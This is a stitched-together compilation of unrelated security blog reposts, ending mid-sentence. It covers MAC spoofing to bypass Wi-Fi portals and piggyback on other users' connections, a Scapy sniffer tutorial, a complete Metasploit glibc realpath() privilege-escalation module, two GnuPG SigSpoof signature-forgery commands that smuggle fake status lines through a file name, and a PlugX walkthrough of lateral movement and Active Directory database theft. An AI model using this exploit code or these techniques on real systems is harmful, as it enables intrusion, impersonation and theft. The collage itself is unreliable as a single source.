Fi8sVrs

Free Wifi This short tutorial describes a few methods for gaining access to the Internet, a basic human right, from public wireless networks. This tutorial has been tested on Mac and a Raspberry Pi. It should generally work on Linux, and hasn't been tested on Windows. Preparation Make sure you do this step before you are stuck without Internet access: Install Python pip On Linux, install Python Developer package, a dependency for the netifaces package. Ubuntu $ sudo apt-get install python-dev Fedora $ sudo dnf install python-devel Note: For Centos, substitute dnf with yum Make a copy of this repository and install dependencies for the script: $ git clone https://github.com/kylemcdonald/FreeWifi $ cd FreeWifi && sudo pip install -r requirements.txt How to get additional time If you had free internet access but your time has run out, the first thing to try is open an incognito/private window. Here are instructions for a few browsers: Chrome (mobile and desktop) Safari for iOS Safari for Mac Microsoft Edge An incognito/private window will temporarily clear any cookies that may have been used for tracking how much time you spent online, making you look like a "new user" and allowing you to log into the wireless portal again. Unfortunately, most systems track MAC addresses instead of cookies. A MAC address is a unique identifier assigned to every network interface. This means you need to get a new MAC address to get additional time. Fortunately, MAC addresses can be changed in software, without swapping the hardware. The spoof-mac command line utility makes this easy by entering sudo spoof-mac randomize Wi-Fi. If the command fails to run, try entering spoof-mac list --wifi to check what the name of your wireless device is first, and use that manually. After randomizing your MAC, try logging into the wireless portal again. When you're done using the Internet, run sudo spoof-mac reset Wi-Fi to reset your MAC address. Note that MAC address spoofing may be interpreted as an illegal activity depending on why you do it. In some cases it is certainly not illegal: recent mobile operating systems like iOS 8+ and Android 6+ automatically randomize their MAC address when searching for wireless networks to avoid being tracked. But when Aaron Swartz liberated JSTOR, MAC address spoofing was claimed as a signal of intention to commit a crime. How to get free access If the network is open, but you can't get access for some reason, you can also try spoofing the MAC address of a device that is already using the network. To the router, your device and the other device will look like one device. This can cause some minor problems if they interrupt each other, but for light browsing it usually works out fine. To find the MAC addresses of other devices using the network, first you need to connect to the network. You don't need to have Internet access, just a connection. First, on Mac OS run the command sudo chmod o+r /dev/bpf* once to make sure you can sniff wireless data (you need to do this again if you restart your computer). Then run the command python wifi-users.py. You should see a progress bar immediately: Available interfaces: en0 Interface: en0 SSID: nonoinflight Available gateways: en0 Gateway IP: 10.0.1.1 Gateway MAC: 00:e0:4b:22:96:d9 100%|██████████████████████████| 1000/1000 [00:46<00:00, 21.46it/s] Total of 5 user(s): 27:35:96:a8:66:7f 6359 bytes 36:fe:83:9c:35:eb 9605 bytes 65:01:3c:cc:20:e8 17306 bytes 8c:6f:11:2c:f0:ee 20515 bytes 0a:4f:b2:b8:e8:56 71541 bytes If there isn't much traffic on the network, it might take longer. If it's taking too long, type CTRL-C to cancel the sniffing and print whatever results are available. Finally, we want to spoof one of these MAC addresses. For example, in this case we would enter sudo spoof-mac set 0a:4f:b2:b8:e8:56 Wi-Fi to try spoofing the address with the most traffic (they probably have a connection). After running that command, try to access the Internet. If you don't have a connection, try the next MAC in the list. If your Internet connection drops out while using this MAC address, try disconnecting and reconnecting to the wireless network. Note that the original user of the MAC you copied may experience these same connection drop outs if you are both actively using the network. How it works wifi-users.py uses tcpdump to collect wireless packets. Then we look through these packets for any hints of the MAC address (BSSID) of our wireless network. Finally, we look for data packets that mention a user's MAC as well as the network BSSID (or the network gateway), and take note of that MAC using some amount of data. Then we sort the user's MACs by the total amount of data and print them out. Instead of sniffing wireless traffic, in some situations you can also use the command arp -a to get a list of MAC addresses of devices on the wireless network. Then you can either use spoof-mac to copy the address, or use ifconfig directly on Linux and OSX. For the specifics of using ifconfig look at the implementations of set_interface_mac inside SpoofMac's interfaces.py. This repository is dedicated to Lauren McCarthy, who has taught me the most about the art of getting a good deal. Source

@sergiu4995 https://github.com/kylemcdonald/FaceTracker edit: poti incerca Face Substitution Kyle McDonald References: https://www.auduno.com/clmtrackr/examples/facesubstitution.html https://github.com/kylemcdonald http://kylemcdonald.net/

The IT security researchers at Qihoo 360 Total Security have discovered a new malware aiming at stealing cryptocurrencies, including Bitcoin and Ethereum, from the computer system of unsuspected users. Dubbed ClipboardWalletHijacker by researchers; the malware is targeting at Windows-based devices and is currently installed on over 300,000 devices. As indicated by its name the malware monitors clipboard activity to identify what kind of cryptocurrencies the victim has stored in their wallet – In case the malware finds Bitcoin and Ethereum addresses it replaces them with the one used by cybercriminals behind the campaign. So far ClipboardWalletHijacker has stolen over 5 Bitcoin while its last activity was detected on June 12th, 2018, indicating that malware is still active and stealing funds. Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims’ cryptocurrencies. “We strongly recommend users to enable antivirus software while installing new applications”, said the company in their blog post. ClipboardWalletHijacker’s ability to replace wallet address by monitoring clipboard activity is not new, previously, CryptoShuffler Trojan was found following the same method to steal mainstream cryptocurrencies including Dash, Monero, Ethereum, Bitcoin, and Zcash, etc. In March this year, researchers spotted ComboJack malware which is actively stealing cryptocurrency by modifying victims addresses. Moreover, Evrial and Coinbitclip trojan was also caught monitoring clipboard activities of their victims to steal funds by replacing their wallet addresses. If you are investing in cryptocurrency make sure your system is secure and funds are properly protected. Additionally, cryptocurrency users are advised to avoid using online wallets to store their funds and move to hardware wallets. Here is a list of 5 secure Bitcoin wallets which you can trust. In January this year, researchers warned Internet proxy users to watch out for Tor Proxy since its owners were found replacing Bitcoin payment addresses to divert payments from ransomware victims to their own wallets. Via hackread.com

Scapy is an incredible tool when it comes to playing with the network. As it is written on its official website, Scapy can replace a majority of network tools such as nmap, hping and tcpdump. One of the features offered by Scapy is to sniff the network packets passing through a computer’s NIC. Below is a small example: from scapy.all import * interface = "eth0" def print_packet(packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) print("[*] Start sniffing...") sniff(iface=interface, filter="ip", prn=print_packet) print("[*] Stop sniffing") This little sniffer displays the source and the destination of all packets having an IP layer: $ sudo python3 sniff_main_thread.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing It will continue to sniff network packets until it receives a keyboard interruption (CTRL+C). Now, let’s look at a new example: from scapy.all import * from threading import Thread from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet) def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() This piece of code does exactly the same thing as the previous one except that this time the sniff function is executed inside a dedicated thread. Everything works well with this new version except when it comes to stopping the sniffer: $ sudo python3 sniff_thread_issue.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing ^CTraceback (most recent call last): File "sniff_thread_issue.py", line 25, in <module> sleep(100) KeyboardInterrupt During handling of the above exception, another exception occurred: Traceback (most recent call last): File "sniff_thread_issue.py", line 28, in <module> sniffer.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt ^CException ignored in: <module 'threading' from '/usr/lib/python3.5/threading.py'> Traceback (most recent call last): File "/usr/lib/python3.5/threading.py", line 1288, in _shutdown t.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt When CTRL+C is pressed, a SIGTERM signal is sent to the process executing the Python script, triggering its exit routine. However, as said in the official documentation about signals, only the main thread receives signals: As a result, when CTRL+C is pressed, only the main thread raises a KeyboardInterrupt exception. The sniffing thread will continue its infinite sniffing loop, blocking at the same time the call of sniffer.join(). So, how can the sniffing thread be stopped if not by signals? Let’s have a look at this next example: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface self.stop_sniffer = Event() def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet, stop_filter=self.should_stop_sniffer) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() As you may have noticed, we are now using the stop_filter parameter in the sniff function call. This parameter expects to receive a function which will be called after each new packet to evaluate if the sniffer should continue its job or not. An Event object named stop_sniffer is used for that purpose. It is set to true when the join method is called to stop the thread. Is this the end of the story? Not really… $ sudo python3 sniff_thread_issue_2.py [*] Start sniffing... ^C[*] Stop sniffing [!] New Packet: 10.137.2.30 -> 10.137.2.1 One side effect remains. Because the should_stop_sniffer method is called only once after each new packet, if it returns false, the sniffer will continue its job, going back to its infinite sniffing loop. This is why the sniffer stopped one packet ahead of the keyboard interruption. A solution would be to force the sniffing thread to stop. As explained in the official documentation about threading, it is possible to flag a thread as a daemon thread for that purpose: However, even if this solution would work, the thread won’t release the resources it might hold: The sniff function uses a socket which is released just before exiting, after the sniffing loop: try: while sniff_sockets: // Sniffing loop except KeyboardInterrupt: pass if opened_socket is None: for s in sniff_sockets: s.close() return plist.PacketList(lst,"Sniffed") Therefore, the solution I suggest is to open the socket outside the sniff function and to give it to this last one as parameter. Consequently, it would be possible to force-stop the sniffing thread while closing its socket properly: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.daemon = True self.socket = None self.interface = interface self.stop_sniffer = Event() def run(self): self.socket = conf.L2listen( type=ETH_P_ALL, iface=self.interface, filter="ip" ) sniff( opened_socket=self.socket, prn=self.print_packet, stop_filter=self.should_stop_sniffer ) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join(2.0) if sniffer.isAlive(): sniffer.socket.close() Et voilà! The sniffing thread now waits for 2 seconds after having received a keyboard interrupt, letting the time to the sniff function to terminate its job by itself, after which the sniffing thread will be force-stopped and its socket properly closed from the main thread. Source

Dracos Linux ( www.dracos-linux.org ) is the Linux operating system from Indonesian , open source is built based on the Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering. Does not use a GUI-based tools-tools and just have the software using the CLI (command line interface) to perform its operations. Now Dracos currently already up to version 2.0 with the code name "Leak". Screenshot Teaser As the target of development Education Dracos Linux is purposed as an educational,especially to recognize the operation system of linux and we respect ethical hacking. Build from source had always been built from codes instead of installer,this will stimulate users in indonesia to stay creative and to build the spirit of opensource. Repository even though proportionally based on codes,Dracos Linux still intends to construct the repository to build up the processes Like Venomizer Heavy Control We need to recognize this operating system Very Dificult Because Dracos in build from source code, thus forcing us to compile when installing a package or software, which of course will arise the possibility of system failure and other system vulnerabilities. Always from terminal None of every singel tool that was installed inside the OS uses GUI. CLI will always consider to particularly openbox to ease the users in need of multi terminal in applying Penetration Testing Penetration Tools List Link: http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing Information Gathering Vulnerability Assessment Web Attack Exploitation Testing Privilege Escalation Password Attack Social Engineering Man In The Middle Attack Stress Testing Wireless Attack Maintaining Access Forensics Tools Reverse Engineering Malware Analysis Covering Track Download: https://dracos-linux.org/downloads.php Source

wpCrack v1.0 - version 1.0 Installation git clone https://github.com/MrSqar-Ye/wpCrack.git WordPress hash cracker Video Contact: Twitter : @MrSqar Send to my email Source

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => "glibc 'realpath()' Privilege Escalation", 'Description' => %q{ This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1. The target system must have unprivileged user namespaces enabled. This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64) with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc version 2.24-11+deb9u1. }, 'License' => MSF_LICENSE, 'Author' => [ 'halfdog', # Discovery and RationalLove.c exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Jan 16 2018', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'AKA', 'RationalLove.c' ], [ 'BID', '102525' ], [ 'CVE', '2018-1000001' ], [ 'EDB', '43775' ], [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ], [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ], [ 'URL', 'https://securitytracker.com/id/1040162' ], [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ], [ 'URL', 'https://usn.ubuntu.com/3534-1/' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ] ], 'DefaultTarget' => 0)) register_options [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -w -o #{path} #{path}.c" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile" end register_file_for_cleanup path cmd_exec "chmod +x #{path}" end def exploit_data(file) path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file fd = ::File.open path, 'rb' data = fd.read fd.stat.size fd.close data end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check version = kernel_release if Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.36') vprint_error "Linux kernel version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "Linux kernel version #{version} is vulnerable" arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" unless userns_enabled? vprint_error 'Unprivileged user namespaces are not permitted' return CheckCode::Safe end vprint_good 'Unprivileged user namespaces are permitted' version = glibc_version if Gem::Version.new(version.split('-').first) > Gem::Version.new('2.26') vprint_error "GNU C Library version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "GNU C Library version #{version} is vulnerable" # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1 glibc_banner = cmd_exec('ldd --version') unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9') vprint_error 'No offsets for this version of GNU C Library' return CheckCode::Safe end CheckCode::Appears end def exploit if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end if check != CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable' end unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable executable_name = ".#{rand_text_alphanumeric rand(5..10)}" @executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile @executable_path, exploit_data('RationalLove.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx @executable_path, exploit_data('RationalLove') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status 'Launching exploit...' output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30 output.each_line { |line| vprint_status line.chomp } end def on_new_session(client) # remove root owned SUID executable if client.type.eql? 'meterpreter' client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi' client.fs.file.rm @executable_path else client.shell_command_token "rm #{@executable_path}" end end end Source

SigSpoof flaw fixed inGnuPG, Enigmail, GPGTools, and python-gnupg. For their entire existence, some of the world's most widely used email encryption tools have been vulnerable to hacks that allowed attackers to spoof the digital signature of just about any person with a public key, a researcher said Wednesday. GnuPG, Enigmail, GPGTools, and python-gnupg have all been updated to patch the critical vulnerability. Enigmail and the Simple Password Store have also received patches for two related spoofing bugs. Digital signatures are used to prove the source of an encrypted message, data backup, or software update. Typically, the source must use a private encryption key to cause an application to show that a message or file is signed. But a series of vulnerabilities dubbed SigSpoof makes it possible in certain cases for attackers to fake signatures with nothing more than someone’s public key or key ID, both of which are often published online. The spoofed email shown at the top of this post can't be detected as malicious without doing forensic analysis that's beyond the ability of many users. Backups and software updates affected, too The flaw, indexed as CVE-2018-12020, means that decades' worth of email messages many people relied on for sensitive business or security matters may have in fact been spoofs. It also has the potential to affect uses that went well beyond encrypted email. CVE-2018-12020 affects vulnerable software only when it enables a setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default, but a variety of highly recommended configurations available online—including the cooperpair safe defaults, Ultimate GPG settings, and Ben's IT-Kommentare—turn it on. Once verbose is enabled, Brinkmann's post includes three separate proof-of-concept spoofing attacks that work against the previously mentioned tools and possibly many others. The spoofing works by hiding metadata in an encrypted email or other message in a way that causes applications to treat it as if it were the result of a signature-verification operation. Applications such as Enigmail and GPGTools then cause email clients such as Thunderbird or Apple Mail to falsely show that an email was cryptographically signed by someone chosen by the attacker. All that's required to spoof a signature is to have a public key or key ID. The attacks are relatively easy to carry out. The code for one of Brinkmann’s PoC exploits that forges the digital signature of Enigmail developer Patrick Brunschwig is: $ echo 'Please send me one of those expensive washing machines.' \ | gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \ \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\ \n[GNUPG:] TRUST_FULLY 0 classic\ \ngpg: '\'`" > poc1.msg A second exploit is: echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \ \n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\ \n[GNUPG:] TRUST_FULLY\ \n[GNUPG:] BEGIN_DECRYPTION\ \n[GNUPG:] DECRYPTION_OKAY\ \n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\ \ngpg: '\'`" > poc2.msg Brinkmann told Ars that the root cause of the bug goes back to GnuPG 0.2.2 from 1998, "although the impact would have been different then and changed over time as more apps use GPG." He publicly disclosed the vulnerability only after developers of the tools known to be vulnerable were patched. The flaws are patched in GnuPG version 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, and python GnuPG 0.4.3. People who want to know the status of other applications that use OpenPGP should check with the developers. Wednesday's vulnerability disclosure comes a month after researchers revealed a different set of flaws that made it possible for attackers to decrypt previously obtained emails that were encrypted using PGP or S/MIME. Efail, as the bugs were dubbed, could be exploited in a variety of email programs, including Thunderbird, Apple Mail, and Outlook. Separately, Brinkmann reported two SigSpoof-related vulnerabilities in Enigmail and the Simple Password Store that also made it possible to spoof digital signatures in some cases. CVE-2018-12019 affecting Enigmail can be triggered even when the verbose setting isn't enabled. It, too, is patched in the just-released version 2.0.7. CVE-2018-12356, meanwhile, let remote attackers spoof file signatures on configuration files and extensions scripts, potentially allowing the accessing of passwords or the execution of malicious code. The fix is here. Via arstechnica.com

Part 1: Following my previous article on PlugX, I would like to continue the analysis but now use the PlugX controller to mimic some of the steps that might be executed by an attacker. As you know the traditional steps of an attack lifecycle follow, normally, a predictable sequence of events i.e., Reconnaissance, initial compromise, establish foothold, escalate privileges, internal reconnaissance, move laterally, maintain persistence, complete mission. For sake of brevity I will skip most of the steps and will focus on the lateral movement.I will use the PlugX controller and C2 functionality to simulate an attacker that established a foothold inside an environment and obtained admin access to a workstation. Following that, the attacker moved laterally to a Windows Domain Controller. I will use the PlugX controller to accomplish this scenario and observe how an attacker would operate within a compromised environment. As we saw previously, the PlugX controller interface allows an operator to build payloads, set campaigns and define the preferred method for the compromised hosts to check-in and communicate with the controller. In the PlugX controller, English version from Q3 2013, an operator can build the payload using two techniques. One is using the “DNS Online” technique which allows the operator to define the C2 address e.g, an URL or IP address, that will be used by the payload to speak with the C2. The other method, is the “Web Online”, which allows the operator to tell the payload from where it should fetch the C2 address. This method allows the operator to have more control over the campaign. The following diagram illustrates how the “Web Online” technique works. Why do I say this technique would allow an attacker to have more control? Consider the case that an organization was compromised by a threat actor that use this PlugX technique. In case the C2 is discovered, the impacted organization could block the IP or URL on the existing boundary security controls as a normal reaction to the concerns of having an attacker inside the network. However, the attacker could just change the C2 string and point it to a different system. In case the organization was not able to scope the incident and understand the TTP’s (Tools, Tactics and Procedures) then the attacker would still maintain persistence in the environment. This is an example that when conducting incident response, among other things, you need to have visibility into the tools and techniques the attacker is using so you could properly scope the incident and perform effective and efficient containment and eradication steps. As an example of this technique, below is a print screen from a GitHub page that has been used by an unknown threat actor to leverage this method. So, how to leverage this technique on the PlugX builder? The picture below shows how the operator could create a payload that uses the “Web Online” technique. The C2 address would be fetched from a specified site e.g. a Pastebin address, which on its turn would redirect the payload to the real C2 address. The string “DZKSAFAAHHHHHHOCCGFHJGMGEGFGCHOCDGPGNGDZJS” in this case is used to decode to the real C2 address which is “www.builder.com”. On the “PlugX: some uncovered points” article, Fabien Perigaud writes about how to decode this string. Palo Alto Unit42 gives another example of this technique on the “Paranoid PlugX” article. The article “Winnti Abuses GitHub for C&C Communications” from Cedric Pernet ilustrates an APT group leveraging this technique using GitHub. For sake of simplicity, in this article, I’m going to use the DNS Online technique using “www.builder.com” as C2 address. Next, on the “First” tab I specify the campaing ID and the password used by the payload to connect to the C2. Next, on the Install tab I specify the persistence settings, in this case I’m telling the payload to install a service and I can specify different settings including where to deploy the binaries, the service name and service description. In addition, I can specify that if the Service persistence mechanism fails due to some reason the payload should install the persistence mechanism using the Registry and I can specify which HIVE should be used. Then, In the inject tab I specify which process will be injected with the malicious payload. In this case I choose “svchost.exe”. This will make PlugX start a new instance of “svchost.exe” and then inject the malicious code into svchost.exe process address space using process hollowing technique. Other than that, the operator could define a schedule and determine which time of the week the payload should communicate with the C2. Also the operator could define the Screen Recording capability that will take screenshots at a specific frequency and will save them encrypted in a specific folder. Last settings on the “option” tab allow the operator to enable the keylogger functionality and specify if the payload should hide it self and also delete itself after execution. Finally, after all the settings defined, the operator can create/download the payload in different formats. An executable, binary form (Shellcode), or an array in C that can then be plugged in another delivery mechanism e.g, PowerShell or MsBuild. After deploying and installing the payload on a system, that system will check-in into the PlugX controller and an operator can call the “Manager” to perform the different actions. In this example I show how an attacker, after having compromised a system, uses the C2 interface to: Browse the network Access remote systems via UNC path Upload and execute a file e.g., upload PlugX binary Invoke a command shell and perform remote commands e.g., execute PlugX binary on a remote system Previous pictures illustrate actions that the attacker could perform to move laterally and, for example, at some point in time, access a domain controller via UNC path, upload the PlugX payload to a directory of its choice and execute it. In this case the pictures show that the PlugX payload was dropped into c:\PerfLogs\Admin folder and then was executed using WMI. Below example shows the view from the attacker with two C2 sessions. One for one workstation and another for a domain controller. Having access to a domain controller is likely one of the goals of the attacker so he can obtain all the information he needs about an organization from the Active Directory database. To access the Active Directory database, the attacker could, for example, run the “ntdsutil.exe” command to create a copy of the “NTDS.dit” file using Volume Shadow Copy technique. Then, the attacker can access the database and download it to a system under his control using the PlugX controller interface. The picture below illustrates an attacker obtained the relevant data that was produced using the “ntdsutil.exe” command. Finally, the attacker might delete the artifacts that were left behind on the file system as consequence of running “ntdsutil.exe”. So, in summary, we briefly looked at the different techniques a PlugX payload could be configured to speak with a Command and Controller. We built, deploy and install a payload. Compromised a system and obtain a perspective from PlugX operator. We move laterally to a domain controller and installed the PlugX payload and then used a command shell to obtain the Active Directory database. Of course, as you noted, the scenario was accomplished with an old version of the PlugX controller. Newer versions likely have many new features and capabilities. For example, the print screen below is from a PlugX builder from 2014 (MD5: 534d28ad55831c04f4a7a8ace6dd76c3) which can create different payloads that perform DLL Search order hijacking using Lenovo’s RGB LCD Display Utility for ThinkPad (tplcdclr.exe) or Steve Gibson’s Domain Name System Benchmarking Utility (sep_NE.exe). The article from Kaspersky “PlugX malware: A good hacker is an apologetic hacker” outlines a summary about it. That’s it! With this article we set the table for the next article focusing on artifacts that might helps us uncover the hidden traits that were left behind by the attacker actions performed during this scenario. Stay tuned and have fun! Source: countuponsecurity.com

Many cyber incidents can be traced back to an original alert that was either missed or ignored by the Security Operations Center (SOC) or Incident Response (IR) team. While most analysts and SOCs are vigilant and responsive, the fact is they are often overwhelmed with alerts. If a SOC is unable to review all the alerts it generates, then sooner or later, something important will slip through the cracks. The core issue here is scalability. It is far easier to create more alerts than to create more analysts, and the cyber security industry is far better at alert generation than resolution. More intel feeds, more tools, and more visibility all add to the flood of alerts. There are things that SOCs can and should do to manage this flood, such as increasing automation of forensic tasks (pulling PCAP and acquiring files, for example) and using aggregation filters to group alerts into similar batches. These are effective strategies and will help reduce the number of required actions a SOC analyst must take. However, the decisions the SOC makes still form a critical bottleneck. This is the “Analyze/ Decide” block in Figure 1. Figure 1: Basic SOC triage stages In this blog post, we propose machine learning based strategies to help mitigate this bottleneck and take back control of the SOC. We have implemented these strategies in our FireEye Managed Defense SOC, and our analysts are taking advantage of this approach within their alert triaging workflow. In the following sections, we will describe our process to collect data, capture alert analysis, create a model, and build an efficacy workflow – all with the ultimate goal of automating alert triage and freeing up analyst time. Reverse Engineering the Analyst Every alert that comes into a SOC environment contains certain bits of information that an analyst uses to determine if the alert represents malicious activity. Often, there are well-paved analytical processes and pathways used when evaluating these forensic artifacts over time. We wanted to explore if, in an effort to truly scale our SOC operations, we could extract these analytical pathways, train a machine to traverse them, and potentially discover new ones. Think of a SOC as a self-contained machine that inputs unlabeled alerts and outputs the alerts labeled as “malicious” or “benign”. How can we capture the analysis and determine that something is indeed malicious, and then recreate that analysis at scale? In other words, what if we could train a machine to make the same analytical decisions as an analyst, within an acceptable level of confidence? Basic Supervised Model Process The data science term for this is a “Supervised Classification Model”. It is “supervised” in the sense that it learns by being shown data already labeled as benign or malicious, and it is a “classification model” in the sense that once it has been trained, we want it to look at a new piece of data and make a decision between one of several discrete outcomes. In our case, we only want it to decide between two “classes” of alerts: malicious and benign. In order to begin creating such a model, a dataset must be collected. This dataset forms the “experience” of the model, and is the information we will use to “train” the model to make decisions. In order to supervise the model, each unit of data must be labeled as either malicious or benign, so that the model can evaluate each observation and begin to figure out what makes something malicious versus what makes it benign. Typically, collecting a clean, labeled dataset is one of the hardest parts of the supervised model pipeline; however, in the case of our SOC, our analysts are constantly triaging (or “labeling”) thousands of alerts every week, and so we were lucky to have an abundance of clean, standardized, labeled alerts. Once a labeled dataset has been defined, the next step is to define “features” that can be used to portray the information resident in each alert. A “feature” can be thought of as an aspect of a bit of information. For example, if the information is represented as a string, a natural 